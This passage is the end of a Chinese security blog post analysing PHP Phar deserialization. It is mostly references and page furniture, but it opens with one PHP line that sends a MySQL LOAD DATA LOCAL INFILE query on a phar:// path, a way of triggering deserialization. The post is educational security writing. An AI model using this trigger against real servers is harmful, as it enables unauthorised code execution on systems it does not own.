<span class="token variable">$p</span> <span class="token operator">=</span> <span class="token function">mysqli_query</span><span class="token punctuation">(</span><span class="token variable">$m</span><span class="token punctuation">,</span> <span class="token single-quoted-string string">'LOAD DATA LOCAL INFILE \'phar://test.phar/flag.txt\' INTO TABLE users  LINES TERMINATED BY \'\r\n\'  IGNORE 1 LINES;'</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span></code></pre>
<h1 id="0x04-Reference"><a href="#0x04-Reference" class="headerlink" title="0x04 Reference"></a>0x04 Reference</h1><p><a target="_blank" rel="noopener" href="https://paper.seebug.org/680/">https://paper.seebug.org/680/</a><br><a target="_blank" rel="noopener" href="https://cbatl.gitee.io/2020/08/11/phar/">https://cbatl.gitee.io/2020/08/11/phar/</a><br><a target="_blank" rel="noopener" href="https://coomrade.github.io/2018/10/26/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%94%BB%E5%87%BB%E9%9D%A2%E6%8B%93%E5%B1%95%E6%8F%90%E9%AB%98%E7%AF%87/">反序列化攻击面拓展提高篇</a><br><a target="_blank" rel="noopener" href="https://www.cnblogs.com/qiujun/p/6861773.html">apache的三种工作模式</a></p>
</div><div id="reward-container"><span class="hty-icon-button button-glow" id="reward-button" title="打赏" onclick="var qr = document.getElementById(&quot;qr&quot;); qr.style.display = (qr.style.display === &quot;none&quot;) ? &quot;block&quot; : &quot;none&quot;;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-hand-coin-line"></use></svg></span><div id="reward-comment">I'm so cute. Please give me a candy.</div><div id="qr" style="display:none;"><div style="display:inline-block"><a target="_blank" rel="noopener" href="https://gitee.com/m0re/picture/raw/master/img/wechatpay.jpg"><img loading="lazy" src="https://gitee.com/m0re/picture/raw/master/img/wechatpay.jpg" alt="微信支付" title="微信支付"></a><div><span style="color:#2DC100"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-wechat-pay-line"></use></svg></span></div></div></div></div><ul class="post-copyright"><li class="post-copyright-author"><strong>本文作者：</strong>m0re</li><li class="post-copyright-link"><strong>本文链接：</strong><a href="https://m0re.top/posts/8a280b82/" title="浅析Phar反序列化">https://m0re.top/posts/8a280b82/</a></li><li class="post-copyright-license"><strong>版权声明：</strong>本博客所有文章除特别声明外，均默认采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 "><svg class="icon"><use xlink:href="#icon-creative-commons-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-by-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-nc-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-sa-line"></use></svg></a> 许可协议。</li></ul></section></article><div class="post-nav"><div class="post-nav-item"><a class="post-nav-prev" href="/posts/a026b628/" rel="prev" title="Xray和burpsuite联动实现被动漏扫"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-left-s-line"></use></svg><span class="post-nav-text">Xray和burpsuite联动实现被动漏扫</span></a></div><div class="post-nav-item"><a class="post-nav-next" href="/posts/9e44b07a/" rel="next" title="Thinkphp5.x框架学习"><span class="post-nav-text">Thinkphp5.x框架学习</span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-right-s-line"></use></svg></a></div></div></div><div class="hty-card" id="comment"><div class="comment-tooltip text-center"><span>尝试使用 utterances （基于 GitHub Issues）评论系统。</span><br><span>您可以点击下方按钮切换对应评论系统，</span><br><span><script>function showUtterances(){ document.querySelector(".utterances").style.display='block'; document.querySelector('#valine-container').style.display='none'; }function showValine(){ document.querySelector('#valine-container').style.display='block'; document.querySelector(".utterances").style.display='none'; }</script></span><br><span><a class="hty-button hty-button--raised" onclick="showValine()">Valine</a><a class="hty-button hty-button--raised" onclick="showUtterances()">utterances</a></span><br><span><style>.utterances{display:none;}</style></span><br></div><div id="valine-container"></div><script>Yun.utils.getScript("https://cdn.jsdelivr.net/npm/valine@latest/dist/Valine.min.js", () => {
  const valineConfig = {"enable":true,"appId":"gUEA9zKLhCnMFxQI5kI20WiD-gzGzoHsz","appKey":"GQKAp04LNloy3MrDMv86MI3i","placeholder":"评论一下~&nbsp_(:з」∠)_ （填写邮箱可以收到回复通知～）","avatar":null,"pageSize":10,"visitor":true,"highlight":true,"recordIP":true,"enableQQ":true,"requiredFields":["nick","mail"],"el":"#valine-container","lang":"zh-cn"}
  valineConfig.path = "/posts/8a280b82/"
  new Valine(valineConfig)
}, window.Valine);</script></div></main><footer class="sidebar-translate" id="footer"><div class="beian"><a rel="noopener" href="https://beian.miit.gov.cn/" target="_blank">豫ICP备2020025591号-1</a></div><div class="copyright"><span>&copy; 2020 – 2022 </span><span class="with-love" id="animate"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-cloud-line"></use></svg></span><span class="author"> m0re</span></div><div class="powered"><span>由 <a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a> 驱动 v5.1.0</span><span class="footer-separator">|</span><span>主题 - <a rel="noopener" href="https://github.com/YunYouJun/hexo-theme-yun" target="_blank"><span>Yun</span></a> v1.6.1</span></div><div class="live_time"><span>本博客已苟延残喘了</span><span id="display_live_time"></span><span class="moe-text">(●'◡'●)</span><script>function blog_live_time() {
  setTimeout(blog_live_time, 1000);
  const start = new Date('2020-02-21T00:00:00');
  const now = new Date();
  const timeDiff = (now.getTime() - start.getTime());
  const msPerMinute = 60 * 1000;
  const msPerHour = 60 * msPerMinute;
  const msPerDay = 24 * msPerHour;
  const passDay = Math.floor(timeDiff / msPerDay);
  const passHour = Math.floor((timeDiff % msPerDay) / 60 / 60 / 1000);
  const passMinute = Math.floor((timeDiff % msPerHour) / 60 / 1000);
  const passSecond = Math.floor((timeDiff % msPerMinute) / 1000);
  display_live_time.innerHTML = " " + passDay + " 天 " + passHour + " 小时 " + passMinute + " 分 " + passSecond + " 秒";
}
blog_live_time();
</script></div><div id="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_site_uv" title="总访客量"><span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-user-line"></use></svg></span><span id="busuanzi_value_site_uv"></span></span><span class="footer-separator">|</span><span id="busuanzi_container_site_pv" title="总访问量"><span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-eye-line"></use></svg></span><span id="busuanzi_value_site_pv"></span></span></div></footer><a class="hty-icon-button" id="back-to-top" aria-label="back-to-top" href="#"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-up-s-line"></use></svg><svg class="progress-circle-container" viewBox="0 0 100 100"><circle class="progress-circle" id="progressCircle" cx="50" cy="50" r="48" fill="none" stroke="#6200ee" stroke-width="2" stroke-linecap="round"></circle></svg></a><a class="popup-trigger hty-icon-button icon-search" id="search" href="javascript:;" title="搜索"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-search-line"></use></svg></span></a><script>window.addEventListener("DOMContentLoaded", () => {
  // Handle and trigger popup window
  document.querySelector(".popup-trigger").addEventListener("click", () => {
    document.querySelector(".popup").classList.add("show");
    setTimeout(() => {
      document.querySelector(".search-input").focus();
    }, 100);
  });

  // Monitor main search box
  const onPopupClose = () => {
    document.querySelector(".popup").classList.remove("show");
  };

  document.querySelector(".popup-btn-close").addEventListener("click", () => {
    onPopupClose();
  });

  window.addEventListener("keyup", event => {
    if (event.key === "Escape") {
      onPopupClose();
    }
  });
});
</script><script src="/js/search/local-search.js" defer></script><div class="popup search-popup"><div class="search-header"><span class="popup-btn-close close-icon hty-icon-button"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-close-line"></use></svg></span></div><div class="search-input-container"><input class="search-input" id="local-search-input" type="text" placeholder="搜索..." value=""></div><div id="local-search-result"></div></div></div><script src="https://cdn.jsdelivr.net/npm/live2d-widget@^3.1.3/lib/L2Dwidget.min.js"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"https://cdn.jsdelivr.net/npm/live2d-widget-model-wanko@1.0.5/assets/wanko.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true},"react":{"opacity":0.7},"log":false});</script></body></html>